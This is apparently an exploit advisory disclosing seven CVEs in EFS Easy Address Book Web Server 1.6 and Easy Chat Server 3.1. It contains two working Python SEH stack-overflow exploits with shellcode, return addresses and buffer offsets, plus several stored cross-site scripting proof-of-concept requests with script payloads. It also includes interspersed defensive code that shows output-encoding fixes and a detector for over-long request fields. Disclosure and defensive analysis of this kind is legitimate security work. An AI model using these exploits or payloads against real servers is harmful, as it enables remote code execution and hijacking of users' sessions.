Easy Address Book Web Server 1.6 Buffer Overflow / Cross Site Scripting
Posted Aug 31, 2023
Authored by Rafael Pedrero

Easy Address Book Web Server version 1.6 suffers from buffer overflow and cross site scripting vulnerabilities.

tags | exploit, web, overflow, vulnerability, xss
advisories | CVE-2023-4491, CVE-2023-4492, CVE-2023-4493, CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497
SHA-256 | b6befe65e6a55c3b27e84899d0f0cc67abbdb0aab6f0e18d3b97d7670e1e7542

# Exploit Title: Easy Address Book Web Server v1.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-10
# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
# Software Link : http://www.efssoft.com/eabws.exe (md5sum: 69f77623bb32589fb5343f598b61bbd9)
# Tested Version: 1.6
# Tested on: Windows 7, 10

# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer Overflow

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119


Vulnerability description: There is a remote stack-based buffer overflow
(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.
By sending an overly long username string in the name parameter of a POST
request to /searchbook.ghp, an attacker may be able to execute arbitrary code.

Proof of concept:

import socket
import struct

def sendbuff():
    # > arwin.exe kernel32.dll WinExec
    # WinExec is located at 0x776f2c91 in kernel32.dll
    shellcode_WinExec = (
        "\x33\xc0"               # XOR EAX,EAX
        "\x50"                   # PUSH EAX => padding for lpCmdLine
        "\x68\x2E\x65\x78\x65"   # PUSH ".exe"
        "\x68\x63\x61\x6C\x63"   # PUSH "calc"
        "\x8B\xC4"               # MOV EAX,ESP
        "\x6A\x01"               # PUSH 1
        "\x50"                   # PUSH EAX
        "\xBB\x91\x2c\x6f\x77"   # MOV EBX,kernel32.WinExec
        "\xFF\xD3")              # CALL EBX

    shellcode_system = (
        "\x31\xC9"               # xor ecx,ecx
        "\x51"                   # push ecx
        "\x68\x63\x61\x6C\x63"   # push 0x636c6163
        "\x54"                   # push dword ptr esp
        "\xB8\x6f\xb1\xdc\x75"   # mov eax,msvcrt.system
        "\xFF\xD0")              # call eax

    shellcode = shellcode_WinExec
    # SEH
    junk1 = "A"*455
    buffer = junk1
    buffer += "\xeb\x10\x90\x90"            # jmp 0x10 to nops to shellcode
    buffer += struct.pack('<L',0x1001071e)  # pop/pop/ret @ 0x1001071e SSLEAY32.DLL from !Mona 0x1001071e
    buffer += "\x90" * 20
    buffer += shellcode
    junk2 = "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)
    buffer += junk2
    return buffer


def REQ_POST (padding):
    POST = (
        "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: " + str(108 + len(padding))+ "\r\n"
        "Connection: keep-alive\r\n"
        "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"
        "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"
        "Upgrade-Insecure-Requests: 1\r\n"
        "Host: "+str(ip)+"\r\n\r\n"
        "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding +
        "&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"
    )
    return POST

ip = '192.168.X.X'
port = 80
payload = sendbuff()

try:
    print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address Book Web Server V1.6, length " + str(len(payload))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(REQ_POST(payload))
    s.recv(1024)
    s.close()
    print "\n[*] Sended POST length " + str(len(payload))
except:
    print "Connecting error"



# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Address Book Web Server v1.6 does not
sufficiently encode user-controlled input, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via /addrbook.ghp (POST
method) in multiple parameters.

Proof of concept:

POST http://localhost/addrbook.ghp?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 475
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/editcontact.ghp?id=1&cid=12
Cookie: SESSIONID=15337; UserID=; PassWD=
Upgrade-Insecure-Requests: 1
Host: localhost

addrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%40demo1.com&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=Save

Vulnerable parameters: firstname, homephone, lastname, middlename,
workaddress, workcity, workcountry, workphone, workstate, workzip

Response:

<TR>
<TD class=row2><SPAN class=genmed><A target=_blank
class=genmed href="viewcontact.ghp?id=1&cid=12">demo1
</a><script>alert(1);</script><a> demo1</A></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a href="mailto:
demo1@demo1.com">demo1@demo1.com</a></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed>demo1, , , ,
USA</SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a
href="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a
href="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1
</a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD>



# CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2


CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Address Book Web Server v1.6 does not
sufficiently encode user-controlled input, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via /users_admin.ghp (POST
method, authenticated Admin user) in multiple parameters.

Proof of concept:

Example 1:

POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update

Vulnerable parameter: email

Response:

<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15"
value="test"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15"
value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35"
value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><select name="level"><option
>guest</option><option selected>user</option><option >power
user</option></select></TD>
<TD class=row2 align=left><select name="state"><option
selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update"
name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed
href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>

Example 2:

POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=Update

Vulnerable parameter: username

Response:

<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15"
value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15"
value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35" value="
tt@fsdfs.com"> </TD>
<TD class=row2 align=left><select name="level"><option
>guest</option><option selected>user</option><option >power
user</option></select></TD>
<TD class=row2 align=left><select name="state"><option
selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update"
name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed
href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>
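Both findings above (addrbook.ghp and users_admin.ghp) come from the same defect: user input is concatenated into HTML element content or into a value="..." attribute without encoding for that context. The Python below is an added illustration, not the product's code, that rebuilds the two affected fragments with and without context-aware escaping, using the advisory's own payloads (URL-decoded); the function names are assumptions.

```python
import html
import re

# Payloads from the advisory's two requests, URL-decoded (constructed copies).
FIRSTNAME_PAYLOAD = "</a><script>alert(11);</script><a>"
EMAIL_PAYLOAD = '"><script>alert(1);</script>'

def contact_link_vulnerable(cid, firstname, lastname):
    """Mirrors the addrbook.ghp row: the names are concatenated into element
    content, so '</a>' closes the link and '<script>' opens a new element."""
    return ('<A target=_blank class=genmed href="viewcontact.ghp?id=1&cid=%d">'
            "%s %s</A>" % (cid, firstname, lastname))

def contact_link_fixed(cid, firstname, lastname):
    """Element-content context: html.escape() turns < > & into entities, so the
    browser shows the payload as text and the markup structure is unchanged."""
    return ('<A target=_blank class=genmed href="viewcontact.ghp?id=1&cid=%d">'
            "%s %s</A>" % (cid, html.escape(firstname), html.escape(lastname)))

def user_input_vulnerable(name, value):
    """Mirrors users_admin.ghp: the value lands unencoded inside value="...",
    so a leading double quote ends the attribute and '>' ends the tag."""
    return '<input type="text" name="%s" size="35" value="%s">' % (name, value)

def user_input_fixed(name, value):
    """Attribute context: quote=True additionally encodes " and ' so the value
    cannot terminate the quoted attribute it is placed in."""
    return '<input type="text" name="%s" size="35" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))

_SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)

def has_script_element(markup):
    """True if a literal <script ...> start tag survives in the rendered markup."""
    return _SCRIPT_OPEN.search(markup) is not None

if __name__ == "__main__":
    print(contact_link_fixed(12, FIRSTNAME_PAYLOAD, "demo1"))
    print(user_input_fixed("email", EMAIL_PAYLOAD))
```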

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-09
# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497
# Vendor Homepage: http://www.echatserver.com/
# Software Link : http://echatserver.com/ecssetup.exe (md5sum: c682138ebbea9af7948a3f142bbd054b)
# Tested Version: 3.1
# Tested on: Windows 7, 10

# CVE-2023-4494: Vulnerability Type: register Remote Buffer Overflow

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119


Vulnerability description: There is a remote stack-based buffer overflow
(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.
By sending an overly long username string in the username parameter of a GET
request to register.ghp, an attacker may be able to execute arbitrary code.

Proof of concept:

import socket

def sendbuff():
    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
    shellcode = (
        "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
        "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
        "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
        "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
        "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
        "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
        "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
        "\x1c\x39\xbd"
    )

    # SEH
    junk1 = "A"*473
    buffer = junk1
    buffer += "\xeb\x06\x90\x90"  # short jmp to shellcode
    buffer += "\x1e\x0e\x01\x10"  # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL from !Mona
    buffer += shellcode
    junk2 = "D"*(600 - 473 - len(shellcode) - 4 - 4)
    buffer += junk2

    return buffer


def REQ_GET (padding):
    GET = (
        "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"
        "Host: "+str(ip)+":80\r\n"
        "Accept-Language: es-es\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Referer: http://"+str(ip)+"\r\n"
        "Connection: Keep-Alive\r\n\r\n"
    )
    return GET

ip = '192.168.X.X' # change the ip address
port = 80
payload = sendbuff()

try:
    print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server 3.1, length " + str(len(payload))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(REQ_GET(payload))
    s.recv(1024)
    s.close()
    print "\n[*] Sended GET length " + str(len(payload))
except:
    print "Connection error"
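
The two SEH overflows in this advisory (searchbook.ghp name via POST, register.ghp username via GET) share one detection signature: a watched form field far longer than any legitimate value, often carrying raw opcode bytes. The Python below is an added example written for this page, not the advisory's or the vendor's code; the 200-byte threshold, the sample requests and the 10.0.0.5 host are constructed assumptions.

```python
from urllib.parse import parse_qsl, urlsplit

# Endpoints and form fields the advisory names, and the length above which a
# value is flagged (assumption: 200 bytes is far below the 455/473-byte
# offsets the PoCs need, and far above any real name or username).
WATCHED = {"/searchbook.ghp": {"name"}, "/register.ghp": {"username"}}
MAX_VALUE_LEN = 200

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, target, headers, body.decode("latin-1")

def inspect_request(raw):
    """Return one finding per over-long watched field; [] for a normal request.

    Query-string fields are checked for every method (register.ghp is hit via
    GET); form-encoded bodies are checked for POST (searchbook.ghp).
    """
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)  # absolute-form targets resolve to a path as well
    params = parse_qsl(url.query, keep_blank_values=True)
    if method == "POST" and "x-www-form-urlencoded" in headers.get("content-type", ""):
        params += parse_qsl(body, keep_blank_values=True)
    findings = []
    for field, value in params:
        if field in WATCHED.get(url.path, ()) and len(value) > MAX_VALUE_LEN:
            # raw opcode bytes in a text field are a stronger signal than length alone
            binary = sum(1 for c in value if not 0x20 <= ord(c) <= 0x7e)
            findings.append({"path": url.path, "field": field,
                             "length": len(value), "non_printable": binary})
    return findings

# Constructed samples (not captured traffic): the first mirrors the shape of
# the searchbook.ghp PoC, the second the register.ghp GET, the third is benign.
SAMPLE_SEARCHBOOK = (b"POST http://10.0.0.5/searchbook.ghp?id=1 HTTP/1.1\r\n"
                     b"Host: 10.0.0.5\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
                     b"addrbookid=1&name=" + b"A" * 455 + b"\xeb\x10\x90\x90"
                     + b"D" * 381 + b"&search=Start+Search")
SAMPLE_REGISTER = (b"GET /register.ghp?username=" + b"B" * 473
                   + b"&password= HTTP/1.1\r\nHost: 10.0.0.5\r\n\r\n")
SAMPLE_BENIGN = (b"POST /searchbook.ghp?id=1 HTTP/1.1\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                 b"addrbookid=1&name=Alice&search=Start+Search")

if __name__ == "__main__":
    for sample in (SAMPLE_SEARCHBOOK, SAMPLE_REGISTER, SAMPLE_BENIGN):
        print(inspect_request(sample))
```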



# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Chat Server v3.1 does not sufficiently
encode user-controlled input, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via /registresult.htm (POST method) in the Resume
parameter. The stored payload is rendered when /register.ghp is loaded.

Proof of concept:

POST http://localhost/registresult.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 257
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/register.ghp?username=<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

UserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change

Response:
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been
changed successfully.</center></body>


Go to:
http://localhost/register.ghp?username=<redacted>&password=<redacted>

Response - xss:
<TR><TD>
Your profile/interests:<BR>
<TEXTAREA rows="4" cols="30"
name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA>
<INPUT type="hidden" name="cw" value="0">
<INPUT type="hidden" name="RoomID" value="<!--$RoomID-->">
<INPUT type="hidden" name="RepUserName" value="<!--$UserName-->">
</TD></TR>

# CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2


CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Chat Server v3.1 does not sufficiently
encode user-controlled input, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via /body2.ghp (POST method) in the mtowho parameter.


Proof of concept:

POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/chatsubmit.ghp?username=<redacted>&password=<redacted>&room=4
Upgrade-Insecure-Requests: 1
Host: localhost

staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=


Response:
<html>
<head>
</head>
<body>
<script language="JavaScript">
<!--
parent.board.document.body.innerHTML=parent.board.document.body.innerHTML+"<br><font
color=green size=2>08:22:16 <a target=chatsubmit
href=javascript:parent.chatsubmit.getname('<redacted>');><redacted></a> =>
<a target=chatsubmit
href=javascript:parent.chatsubmit.getname('</script><script>alert(1);</script><script>');></script><script>alert(1);</script><script></a>
</font><font color=#000000 size=2>demo </font> <img src=/face/100.gif
border=0>";
// -->
</script>
</body>
</html>
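The body2.ghp response above nests three contexts: the mtowho value lands in a JavaScript string literal inside a <script> element, that string is an HTML fragment later assigned to innerHTML, and inside the fragment the value sits in a javascript: URL argument. Because the HTML parser tokenises the page before any script runs, a literal "</script>" inside the JS string ends the element early. The Python below is an added example, not the product's code, that encodes for each layer from the inside out; the function names are assumptions.

```python
import html
import json

# URL-decoded mtowho value from the advisory's body2.ghp request (constructed copy).
MTOWHO_PAYLOAD = "</script><script>alert(1);</script><script>"

def chat_line_vulnerable(name, msg):
    """Mirrors the body2.ghp response: the name is spliced raw into a JS string
    literal inside <script>; the HTML parser sees '</script>' before JS runs."""
    return ('<script language="JavaScript">\n'
            'parent.board.document.body.innerHTML+="<br><font color=green size=2>'
            "<a target=chatsubmit href=javascript:parent.chatsubmit.getname('%s');>"
            '%s</a></font><font color=#000000 size=2>%s </font>";\n'
            "</script>" % (name, name, msg))

def js_string_literal(value):
    """Encode for a JS string literal that is embedded in a <script> element:
    JSON quoting, then < and > as \\u003c and \\u003e so '</script>' cannot appear."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")

def chat_line_fixed(name, msg):
    """Encode inside out: (1) the getname() argument is a JS literal inside an
    HTML attribute, so JS-encode then attribute-encode it; (2) the link text and
    message are HTML content assigned via innerHTML, so HTML-escape them;
    (3) the whole fragment is a JS literal inside <script>, so JS-encode it."""
    href_arg = html.escape(js_string_literal(name), quote=True)
    fragment = ('<br><font color=green size=2><a target=chatsubmit '
                'href="javascript:parent.chatsubmit.getname(%s);">%s</a></font>'
                '<font color=#000000 size=2>%s </font>'
                % (href_arg, html.escape(name), html.escape(msg)))
    return ('<script language="JavaScript">\n'
            "parent.board.document.body.innerHTML+=%s;\n"
            "</script>" % js_string_literal(fragment))

def script_start_tags(markup):
    """Number of '<script' start tags an HTML parser would see; must stay 1."""
    return markup.lower().count("<script")

if __name__ == "__main__":
    print(chat_line_fixed(MTOWHO_PAYLOAD, "demo"))
```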


# CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Chat Server v3.1 does not sufficiently
encode user-controlled input, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via /registresult.htm (POST method) in the Icon
parameter. The stored payload is rendered when /users.ghp is loaded.

Proof of concept:

POST /registresult.htm HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/register.ghp?username=<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1

UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change

Response:
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been
changed successfully.</center></body>

When the user information page loads:

http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4

&nbsp;<font color="red">[vip room]</font>
<br><br>
[Online users:1]<br><br>[<a
href="javascript:parent.chatsubmit.getname('All');"
target="chatsubmit">All</a>]
<br><br>
<script>
if(navigator.appName!="Netscape" && parent.chatsubmit.document &&
parent.chatsubmit.document.readyState == "complete")
parent.chatsubmit.listcolorchange();
</script>
<img src="/images/""><script>alert(111)</script><i>[<a
href="javascript:parent.chatsubmit.getname('<redacted>');"
target="chatsubmit"><redacted></a>]<==<br>
<br>
<br><br>
[<a href="javascript:OnRegister();">Change infomation</a>]
</i>
